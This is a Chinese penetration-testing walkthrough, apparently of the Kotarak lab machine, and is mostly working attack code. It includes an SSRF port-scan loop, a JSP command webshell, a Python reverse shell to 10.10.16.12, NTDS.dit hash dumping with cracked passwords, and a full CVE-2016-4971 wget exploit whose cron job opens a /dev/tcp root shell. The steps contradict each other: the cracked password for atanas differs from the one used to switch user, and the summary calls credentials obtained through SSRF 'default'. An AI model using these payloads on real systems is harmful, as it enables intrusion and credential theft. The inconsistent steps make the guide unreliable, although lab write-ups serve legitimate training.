Kotarak渗透测试实战教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行端口扫描：<\/p>
nmap -p- 10.10.10.55 --min-rate 10000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22\/tcp: OpenSSH 7.2p2 Ubuntu<\/li>
8080\/tcp: Apache Tomcat 8.5.5<\/li>
60000\/tcp: 未知服务<\/li>
<\/ul>
1.2 目录爆破<\/h3>
使用feroxbuster对60000端口进行目录爆破：<\/p>
feroxbuster --url http:\/\/10.10.10.55:60000
<\/span><\/span><\/code><\/pre>2. SSRF漏洞利用<\/h2>
2.1 端口扫描<\/h3>
发现60000端口存在SSRF漏洞，可用于内部端口扫描：<\/p>
time for<\/span> i in {<\/span>1..65535}<\/span>; do<\/span> 
<\/span><\/span>  res=<\/span>$(<\/span>curl -s "http:\/\/10.10.10.55:60000\/url.php?path=http%3A%2F%2F127.0.0.1%3A<\/span>${<\/span>i}<\/span>"<\/span>)<\/span>; 
<\/span><\/span>  len=<\/span>$(<\/span>echo $res | wc -w)<\/span>; 
<\/span><\/span>  if<\/span> [<\/span> "<\/span>$len"<\/span> -gt "0"<\/span> ]<\/span>; then<\/span> 
<\/span><\/span>    echo -n "<\/span>${<\/span>i}<\/span>: "<\/span>; 
<\/span><\/span>    echo $res | tr -d "\r"<\/span> | head -1 | cut -c-100; 
<\/span><\/span>  fi<\/span>; 
<\/span><\/span>done<\/span>
<\/span><\/span><\/code><\/pre>发现888端口有响应，访问：<\/p>
view-source:http:\/\/10.10.10.55:60000\/url.php?path=<\/span>http%3a%2f%2f127.0.0.1%3a888%3fdoc%3dbackup
<\/span><\/span><\/code><\/pre>获取到Tomcat凭据：<\/p>

用户名: admin<\/li>
密码: 3@g01PdhB!<\/li>
<\/ul>
3. Tomcat管理界面利用<\/h2>
3.1 上传WAR后门<\/h3>
访问Tomcat管理界面：<\/p>
http:\/\/10.10.10.55:8080\/manager\/html
<\/code><\/pre>
使用获取的凭据登录，上传WAR后门。<\/p>
创建WAR文件的脚本：<\/p>
#!\/bin\/sh
<\/span><\/span><\/span><\/span>wget https:\/\/raw.githubusercontent.com\/tennc\/webshell\/master\/jsp\/jspbrowser\/Browser.jsp -O index.jsp
<\/span><\/span>rm -rf wshell
<\/span><\/span>rm -f wshell.war
<\/span><\/span>mkdir wshell
<\/span><\/span>cp index.jsp wshell\/
<\/span><\/span>cd wshell
<\/span><\/span>jar -cvf ..\/wshell.war *
<\/span><\/span><\/code><\/pre>3.2 反向Shell<\/h3>
上传反向Shell的JSP文件(rev.jsp)：<\/p>
<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
<\/FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
<\/pre>
<\/BODY><\/HTML>
<\/code><\/pre>
Python反向Shell代码：<\/p>
import<\/span> socket,<\/span>subprocess,<\/span>os;s=<\/span>socket.<\/span>socket(socket.<\/span>AF_INET,socket.<\/span>SOCK_STREAM);s.<\/span>connect(("10.10.16.12"<\/span>,10032<\/span>));os.<\/span>dup2(s.<\/span>fileno(),0<\/span>); os.<\/span>dup2(s.<\/span>fileno(),1<\/span>);os.<\/span>dup2(s.<\/span>fileno(),2<\/span>);import<\/span> pty; pty.<\/span>spawn("\/bin\/sh"<\/span>)
<\/span><\/span><\/code><\/pre>4. NTDS.dit数据库恢复<\/h2>
4.1 下载数据库文件<\/h3>
通过Webshell访问：<\/p>
http:\/\/10.10.10.55:8080\/wshell\/index.jsp?sort=1&dir=%2fhome%2ftomcat%2fto_archive%2fpentest_data
<\/code><\/pre>
下载两个关键文件：<\/p>

20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit<\/li>
20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin<\/li>
<\/ul>
4.2 提取哈希<\/h3>
使用impacket-secretsdump提取哈希：<\/p>
impacket-secretsdump -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL
<\/span><\/span><\/code><\/pre>获取的哈希值：<\/p>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
<\/code><\/pre>
4.3 破解哈希<\/h3>
使用在线破解工具(如crackstation.net)破解哈希，获得：<\/p>

Administrator: f16tomcat!<\/li>
atanas: Password123!<\/li>
<\/ul>
5. 权限提升<\/h2>
5.1 切换到atanas用户<\/h3>
su atanas
<\/span><\/span>密码: f16tomcat!
<\/span><\/span><\/code><\/pre>获取user flag:<\/p>
93f844f50491ef797c9c1b601b4bece8
<\/code><\/pre>
5.2 TRP00F漏洞利用<\/h3>
使用TRP00F工具进行权限提升：<\/p>
python3 trp00f.py --lhost 10.10.16.12 --lport 10012<\/span> --rhost 10.10.16.12 --rport 10011<\/span> --http 1111<\/span>
<\/span><\/span><\/code><\/pre>选择利用pkexec漏洞。<\/p>
5.3 Wget漏洞利用(CVE-2016-4971)<\/h3>
5.3.1 准备恶意.wgetrc文件<\/h4>
echo "post_file = \/etc\/shadow"<\/span> > .wgetrc
<\/span><\/span>echo "output_document = \/etc\/cron.d\/wget-root-shell"<\/span> >> .wgetrc
<\/span><\/span><\/code><\/pre>5.3.2 启动FTP服务器<\/h4>
python -m pyftpdlib -p 21<\/span> -w
<\/span><\/span><\/code><\/pre>5.3.3 利用脚本<\/h4>
# wget-exploit.py<\/span>
<\/span><\/span># CVE-2016-4971<\/span>
<\/span><\/span>import<\/span> SimpleHTTPServer
<\/span><\/span>import<\/span> SocketServer
<\/span><\/span>import<\/span> socket;
<\/span><\/span>
<\/span><\/span>class<\/span> wgetExploit<\/span>(SimpleHTTPServer.<\/span>SimpleHTTPRequestHandler):
<\/span><\/span>    def<\/span> do_GET<\/span>(self):
<\/span><\/span>        # This takes care of sending .wgetrc<\/span>
<\/span><\/span>        print "We have a volunteer requesting "<\/span> +<\/span> self.<\/span>path +<\/span> " by GET :)<\/span>\n<\/span>"<\/span>
<\/span><\/span>        if<\/span> "Wget"<\/span> not<\/span> in<\/span> self.<\/span>headers.<\/span>getheader('User-Agent'<\/span>):
<\/span><\/span>            print "But it's not a Wget :( <\/span>\n<\/span>"<\/span>
<\/span><\/span>            self.<\/span>send_response(200<\/span>)
<\/span><\/span>            self.<\/span>end_headers()
<\/span><\/span>            self.<\/span>wfile.<\/span>write("Nothing to see here..."<\/span>)
<\/span><\/span>            return<\/span>
<\/span><\/span>        
<\/span><\/span>        print "Uploading .wgetrc via ftp redirect vuln. It should land in \/root <\/span>\n<\/span>"<\/span>
<\/span><\/span>        self.<\/span>send_response(301<\/span>)
<\/span><\/span>        new_path =<\/span> '<\/span>%s<\/span>'<\/span>%<\/span>('ftp:\/\/anonymous@<\/span>%s<\/span>:<\/span>%s<\/span>\/.wgetrc'<\/span>%<\/span>(FTP_HOST, FTP_PORT) )
<\/span><\/span>        print "Sending redirect to <\/span>%s<\/span> <\/span>\n<\/span>"<\/span>%<\/span>(new_path)
<\/span><\/span>        self.<\/span>send_header('Location'<\/span>, new_path)
<\/span><\/span>        self.<\/span>end_headers()
<\/span><\/span>
<\/span><\/span>    def<\/span> do_POST<\/span>(self):
<\/span><\/span>        # In here we will receive extracted file and install a PoC cronjob<\/span>
<\/span><\/span>        print "We have a volunteer requesting "<\/span> +<\/span> self.<\/span>path +<\/span> " by POST :)<\/span>\n<\/span>"<\/span>
<\/span><\/span>        if<\/span> "Wget"<\/span> not<\/span> in<\/span> self.<\/span>headers.<\/span>getheader('User-Agent'<\/span>):
<\/span><\/span>            print "But it's not a Wget :( <\/span>\n<\/span>"<\/span>
<\/span><\/span>            self.<\/span>send_response(200<\/span>)
<\/span><\/span>            self.<\/span>end_headers()
<\/span><\/span>            self.<\/span>wfile.<\/span>write("Nothing to see here..."<\/span>)
<\/span><\/span>            return<\/span>
<\/span><\/span>        
<\/span><\/span>        content_len =<\/span> int(self.<\/span>headers.<\/span>getheader('content-length'<\/span>, 0<\/span>))
<\/span><\/span>        post_body =<\/span> self.<\/span>rfile.<\/span>read(content_len)
<\/span><\/span>        print "Received POST from wget, this should be the extracted \/etc\/shadow file: <\/span>\n\n<\/span>---[begin]---<\/span>\n<\/span> <\/span>%s<\/span> <\/span>\n<\/span>---[eof]---<\/span>\n\n<\/span>"<\/span> %<\/span> (post_body)
<\/span><\/span>        
<\/span><\/span>        print "Sending back a cronjob script as a thank-you for the file..."<\/span>
<\/span><\/span>        print "It should get saved in \/etc\/cron.d\/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"<\/span>
<\/span><\/span>        self.<\/span>send_response(200<\/span>)
<\/span><\/span>        self.<\/span>send_header('Content-type'<\/span>, 'text\/plain'<\/span>)
<\/span><\/span>        self.<\/span>end_headers()
<\/span><\/span>        self.<\/span>wfile.<\/span>write(ROOT_CRON)
<\/span><\/span>        print "<\/span>\n<\/span>File was served. Check on \/root\/hacked-via-wget on the victim's host in a minute! :) <\/span>\n<\/span>"<\/span>
<\/span><\/span>        return<\/span>
<\/span><\/span>
<\/span><\/span>HTTP_LISTEN_IP =<\/span> '10.0.3.1'<\/span>
<\/span><\/span>HTTP_LISTEN_PORT =<\/span> 80<\/span>
<\/span><\/span>FTP_HOST =<\/span> '10.10.16.12'<\/span>
<\/span><\/span>FTP_PORT =<\/span> 21<\/span>
<\/span><\/span>ROOT_CRON =<\/span> """* * * * * root bash -c 'bash -i >& \/dev\/tcp\/10.10.16.12\/10099 0>&1' <\/span>\n<\/span>"""<\/span>
<\/span><\/span>
<\/span><\/span>handler =<\/span> SocketServer.<\/span>TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
<\/span><\/span>print "Ready? Is your FTP server running?"<\/span>
<\/span><\/span>sock =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>result =<\/span> sock.<\/span>connect_ex((FTP_HOST, FTP_PORT))
<\/span><\/span>if<\/span> result ==<\/span> 0<\/span>:
<\/span><\/span>    print "FTP found open on <\/span>%s<\/span>:<\/span>%s<\/span>. Let's go then<\/span>\n<\/span>"<\/span> %<\/span> (FTP_HOST, FTP_PORT)
<\/span><\/span>else<\/span>:
<\/span><\/span>    print "FTP is down :( Exiting."<\/span>
<\/span><\/span>    exit(1<\/span>)
<\/span><\/span>
<\/span><\/span>print "Serving wget exploit on port <\/span>%s<\/span>...<\/span>\n\n<\/span>"<\/span> %<\/span> HTTP_LISTEN_PORT
<\/span><\/span>handler.<\/span>serve_forever()
<\/span><\/span><\/code><\/pre>5.3.4 执行利用<\/h4>
authbind python2 wget-exploit.py
<\/span><\/span><\/code><\/pre>等待约4分钟后获取root权限。<\/p>
获取root flag:<\/p>
950d1425795dfd38272c93ccbb63ae2c
<\/code><\/pre>
6. 关键点总结<\/h2>

通过SSRF漏洞发现内部服务<\/li>
利用Tomcat默认凭据获取初始访问权限<\/li>
上传Webshell获取反向Shell<\/li>
恢复NTDS.dit数据库并提取哈希<\/li>
使用TRP00F工具进行权限提升<\/li>
利用Wget漏洞(CVE-2016-4971)获取root权限<\/li>
<\/ol>
整个渗透测试过程展示了从信息收集到最终获取root权限的完整链条，涉及多种漏洞利用技术。<\/p>